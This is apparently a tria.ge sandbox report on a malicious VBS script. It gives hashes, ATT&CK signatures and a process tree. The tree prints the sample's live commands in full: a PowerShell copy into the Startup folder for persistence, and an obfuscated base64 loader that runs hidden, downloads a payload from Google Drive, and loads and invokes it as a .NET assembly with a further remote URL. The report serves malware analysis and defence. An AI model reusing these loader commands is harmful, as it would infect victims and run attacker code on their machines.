Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
06/11/2024, 00:54
Static task
static1
Behavioral task
behavioral1
Sample
06112024_0054_110424.vbs
Resource
win7-20240903-en
General
-
Target
06112024_0054_110424.vbs
-
Size
140KB
-
MD5
b551d6e65cb8770641782a1c9fea2d46
-
SHA1
913f33925e21db15d167574c6d29e612641c24f5
-
SHA256
dcd8eb05de5d4e76fbadf6cf6ffa17f72e6feba0ab79ea57ec2f507d838c1626
-
SHA512
660b54552fc52f6195db34af7fa8d2fcfb05a0c7b97822cf654dd8360e83e3d416235c44050581a470cc01348583a56154fb55665c60a48cc1df2c8bc3707eb9
-
SSDEEP
1536:ZirfBgt5pzEGw+jDKVRs8UH12oaz+MXdVyagPI1lNyU:ZirZgt5pIGwS8RsXVTahdVyagPIPNd
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0
https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2824 powershell.exe 7 2824 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 2848 powershell.exe 2824 powershell.exe 2800 powershell.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cuqueiro.vbs WScript.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cuqueiro.vbs WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 4 drive.google.com 5 drive.google.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2876 cmd.exe 2404 PING.EXE -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2404 PING.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2800 powershell.exe 2848 powershell.exe 2824 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2800 powershell.exe Token: SeDebugPrivilege 2848 powershell.exe Token: SeDebugPrivilege 2824 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 2504 wrote to memory of 2876 2504 WScript.exe 30 PID 2504 wrote to memory of 2876 2504 WScript.exe 30 PID 2504 wrote to memory of 2876 2504 WScript.exe 30 PID 2876 wrote to memory of 2404 2876 cmd.exe 32 PID 2876 wrote to memory of 2404 2876 cmd.exe 32 PID 2876 wrote to memory of 2404 2876 cmd.exe 32 PID 2876 wrote to memory of 2800 2876 cmd.exe 33 PID 2876 wrote to memory of 2800 2876 cmd.exe 33 PID 2876 wrote to memory of 2800 2876 cmd.exe 33 PID 2504 wrote to memory of 2848 2504 WScript.exe 34 PID 2504 wrote to memory of 2848 2504 WScript.exe 34 PID 2504 wrote to memory of 2848 2504 WScript.exe 34 PID 2848 wrote to memory of 2824 2848 powershell.exe 36 PID 2848 wrote to memory of 2824 2848 powershell.exe 36 PID 2848 wrote to memory of 2824 2848 powershell.exe 36
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\06112024_0054_110424.vbs"1⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:2504 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\06112024_0054_110424.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.orieuquc.vbs')')2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 103⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2404
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\06112024_0054_110424.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.orieuquc.vbs')')3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2800
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SUVYICgoKCdqZ1lpbWFnZVVybCA9IFdwWmh0dHBzOi8vZCcrJ3JpdmUuZ29vZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9MScrJ1V5SHF3cm5YQ2xLQkozajYzTGwxdDJTdFZnR3hiU3QwIFdwWjtqZ1l3ZWJDbGknKydlbnQgJysnPSBOZXcnKyctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O2pnWWltYWdlQnl0ZXMgPSBqZ1l3ZWJDbGllbnQuRG93bmxvYWREYXRhKGpnWWltYWdlVXJsKTtqZ1lpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhqZ1lpbWFnZUJ5dGVzKTtqZ1lzdGFydEZsYWcgPSBXcFo8PEJBU0U2NF9TVEFSVD4+V3BaO2pnWWVuZEZsYWcgPSBXcFo8PEJBU0U2NF9FTkQ+PldwWjtqZ1lzdGFydEluZGV4ID0gamdZaW1hZ2VUZXh0LkluZGV4T2YoamdZc3RhcnRGbGFnKTtqZ1llbmRJbmRleCAnKyc9IGpnWWltYWdlVGV4dC5JbmRleE9mKGpnWWVuZEZsYWcpO2pnWXN0YXJ0SW5kZXggLWdlIDAgLWEnKyduZCBqZ1llbmRJbmRleCAtZ3QgamdZc3RhcnRJbmRleDtqZ1lzdGFydEluZGV4ICs9IGpnWXN0YXJ0RmxhZy5MZW5ndGg7amdZYmFzZTY0TGVuZ3RoID0gamdZZW5kSW5kZXggLSBqZ1lzdGFydEluZGV4O2pnWWJhc2U2NENvbW1hbmQgPSBqZ1lpbWFnZVRleHQuU3Vic3RyaW5nKGpnWXN0YXJ0JysnSW5kZXgsIGpnWWJhc2U2NExlbmd0aCk7amdZYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoamdZYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIGI1dyBGb3JFYWNoLU9iamVjdCB7IGpnWV8gfSlbLTEuLicrJy0oamcnKydZYmFzZTY0Q29tbWEnKyduZC5MZW5ndGgpXTtqZ1ljb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKGpnWWJhcycrJ2U2NFJlJysndmVyc2VkKTtqZ1lsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGknKydvbi5Bc3NlbWJseV06OkxvYWQoamdZY29tbWFuZEJ5dGUnKydzKTtqZ1l2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKFdwWlZBSVdwWik7amdZdmFpTWV0aG9kLkludm9rZShqZ1ludWxsLCBAKFdwWnR4dC4yeDQyNDAxMS92bycrJ24nKycvcmguJysnZWVyZi5uZWdhdGFkdGZvcy5sbGVibScrJ2FjbG9zLy86c3B0JysndGhXcFosIFdwWmRlc2F0aXZhJysnZG9XcFosIFcnKydwWmRlc2F0aXZhZG9XcFosIFdwWmRlc2F0aXZhZG9XJysncFosIFdwWk1TQnVpbGRXcFosIFdwWmRlc2F0aXZhZG9XcFosIFdwWmRlc2F0aXZhZCcrJ29XcFosV3BaZGVzYXRpdmFkb1dwWixXcFpkZXNhdGl2YWRvVycrJ3BaLFdwWmRlc2F0aXZhZG9XcFosV3BaZGVzYXRpJysndmFkb1dwWixXcFpkZXNhdGl2YWRvV3BaLFdwWjFXcFosV3BaZGVzYXRpdmFkb1dwWikpOycpIC1SRVBMYUNlIChbQ0hBcl0xMDYrW0NIQXJdMTAzK1tDSEFyXTg5KSxbQ0hBcl0zNiAgLVJFUExhQ2UnYjV3JyxbQ0hBcl0xMjQgLVJFUExhQ2UgICdXcFonLFtDSEFyXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2848 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "IEX ((('jgYimageUrl = WpZhttps://d'+'rive.google.com/uc?export=download&id=1'+'UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0 WpZ;jgYwebCli'+'ent '+'= New'+'-Object System.Net.WebClient;jgYimageBytes = jgYwebClient.DownloadData(jgYimageUrl);jgYimageText = [System.Text.Encoding]::UTF8.GetString(jgYimageBytes);jgYstartFlag = WpZ<<BASE64_START>>WpZ;jgYendFlag = WpZ<<BASE64_END>>WpZ;jgYstartIndex = jgYimageText.IndexOf(jgYstartFlag);jgYendIndex '+'= jgYimageText.IndexOf(jgYendFlag);jgYstartIndex -ge 0 -a'+'nd jgYendIndex -gt jgYstartIndex;jgYstartIndex += jgYstartFlag.Length;jgYbase64Length = jgYendIndex - jgYstartIndex;jgYbase64Command = jgYimageText.Substring(jgYstart'+'Index, jgYbase64Length);jgYbase64Reversed = -join (jgYbase64Command.ToCharArray() b5w ForEach-Object { jgY_ })[-1..'+'-(jg'+'Ybase64Comma'+'nd.Length)];jgYcommandBytes = [System.Convert]::FromBase64String(jgYbas'+'e64Re'+'versed);jgYloadedAssembly = [System.Reflecti'+'on.Assembly]::Load(jgYcommandByte'+'s);jgYvaiMethod = [dnlib.IO.Home].GetMethod(WpZVAIWpZ);jgYvaiMethod.Invoke(jgYnull, @(WpZtxt.2x424011/vo'+'n'+'/rh.'+'eerf.negatadtfos.llebm'+'aclos//:spt'+'thWpZ, WpZdesativa'+'doWpZ, W'+'pZdesativadoWpZ, WpZdesativadoW'+'pZ, WpZMSBuildWpZ, WpZdesativadoWpZ, WpZdesativad'+'oWpZ,WpZdesativadoWpZ,WpZdesativadoW'+'pZ,WpZdesativadoWpZ,WpZdesati'+'vadoWpZ,WpZdesativadoWpZ,WpZ1WpZ,WpZdesativadoWpZ));') -REPLaCe ([CHAr]106+[CHAr]103+[CHAr]89),[CHAr]36 -REPLaCe'b5w',[CHAr]124 -REPLaCe 'WpZ',[CHAr]39))"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2824
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\93014R2HXTO9RB2AYL0P.temp
Filesize7KB
MD53f1694aba91e95cbd16a2fbe2c251f32
SHA10d5141f470c61208b430cc9d86cd7dba0f179d63
SHA256802ba253569863ba85c8f98b270494ffe0e85430c25d89fd1e8e670260941777
SHA512c4a6f9dea829beb2755b9802bf895b1df98a6051f5cfe443137717a2942dd1edad43ed3b8e1ea4d36cf57dc448f60ca7ad121810ef0608b6d3541903b8c727a5